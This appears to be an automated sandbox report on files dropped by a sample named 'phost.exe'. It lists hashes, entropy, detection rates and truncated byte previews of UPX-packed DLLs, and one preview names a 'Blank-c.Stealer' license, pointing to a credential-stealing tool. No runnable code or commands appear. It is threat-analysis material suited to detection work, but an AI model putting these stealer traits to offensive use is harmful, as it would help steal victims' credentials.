                                                                                                                                                                                                                            Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):26392
                                                                                                                                                                                                                            Entropy (8bit):7.448215150146329
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:qnyukFaypXM5IGQGNf5YiSyvTcAMxkEMrX:qnGAaM5IGQGNR7Syb6xuX
                                                                                                                                                                                                                            MD5:CCE3E60EC05C80F5F5EE014BC933554C
                                                                                                                                                                                                                            SHA1:468D2757B201D6259034215CFD912E8E883F4B9E
                                                                                                                                                                                                                            SHA-256:84A81CCA6D80EDD9EC2D31926231DE393ED7F26ED86AE39219ADC5EAB24B8100
                                                                                                                                                                                                                            SHA-512:7CBCEE4DD4C817FBEF8B9AEF2D457B56970C5E5C03BDF2CAF74415316B44E7DA33EE39B6A434F4760C80F74C33B5C0C5AD00936D438B947A39FFCD53E890CF0C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........t.q|'.q|'.q|'...'.q|'q.}&.q|'q.y&.q|'q.x&.q|'q..&.q|'..}&.q|'.q}'.q|'..}&.q|'..q&.q|'..|&.q|'...'.q|'..~&.q|'Rich.q|'........PE..d...Z..e.........." ...#.0................................................................`......................................... ...L....................`..............l..........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):637720
                                                                                                                                                                                                                            Entropy (8bit):7.993319352541641
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:12288:kevMEHnoed8VDT4Rc+iHsLG56RY+hPQHAnxeIglZsk2F24ZHL2Ubsi2UTwYqmH:k8oy8x4Rl1dRnxeDlZxsl2MsD0w9mH
                                                                                                                                                                                                                            MD5:C6ED91B8FDB99EBA4C099EB6D0EEA5D9
                                                                                                                                                                                                                            SHA1:915B2D004F3F07CD18610E413B087568258DA866
                                                                                                                                                                                                                            SHA-256:E6E1910E237AC7847748918804D1C414C0F1696A29E9718739312A233EB96D80
                                                                                                                                                                                                                            SHA-512:92FE738FCD75E39C6BC9F1EDB3B16A1A7CF3AE6C0D2C29C721B1A5BD3E07A4BB8E8295B3AD3CB44BCEE05A8110855B0FEA66B156461C4F1761C53C15D7E67EE5
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W..W..W..^.P.[....U....Z...._.....S.....T..W........V.....V....<.V......V..RichW..........................PE..d......e.........." ...#.`...0.......*.......................................p............`..........................................K..."...H.......@.......................m.......................................7..@...........................................UPX0....................................UPX1.....`.......Z..................@....rsrc....0...@.......^..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):302872
                                                                                                                                                                                                                            Entropy (8bit):7.986491235737331
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:OtX6biS7ltWh4BvaEyS+KPUR30JlSEwV7hqoUnJG4qKOF6J:OZLS5YiyEFPPl3yqrJG4V06J
                                                                                                                                                                                                                            MD5:427668E55E99222B3F031B46FB888F3A
                                                                                                                                                                                                                            SHA1:C9BE630CB2536C20BBC6FC9BA4A57889CDB684BC
                                                                                                                                                                                                                            SHA-256:9CA1B01048D3867CB002A01A148F279BA9EDAF7B7AD04D17E3E911E445F2D831
                                                                                                                                                                                                                            SHA-512:E5CA0DDC2758891090DB726DE2D3FD7F2BA64E309979136B4D3299445B1F751DFD8CD56BB3343499CB6ED479C08732D1D349D32B7F7E5AC417352BD0CE676253
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w...3m..3m..3m..:...5m......1m......>m......;m......0m......0m..x...1m..3m..cm......2m......2m....j.2m......2m..Rich3m..................PE..d...]..e.........." ...#.`.......0.......@................................................`.............................................X....................@..........................................................@...........................................UPX0.....0..............................UPX1.....`...@...^..................@....rsrc................b..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
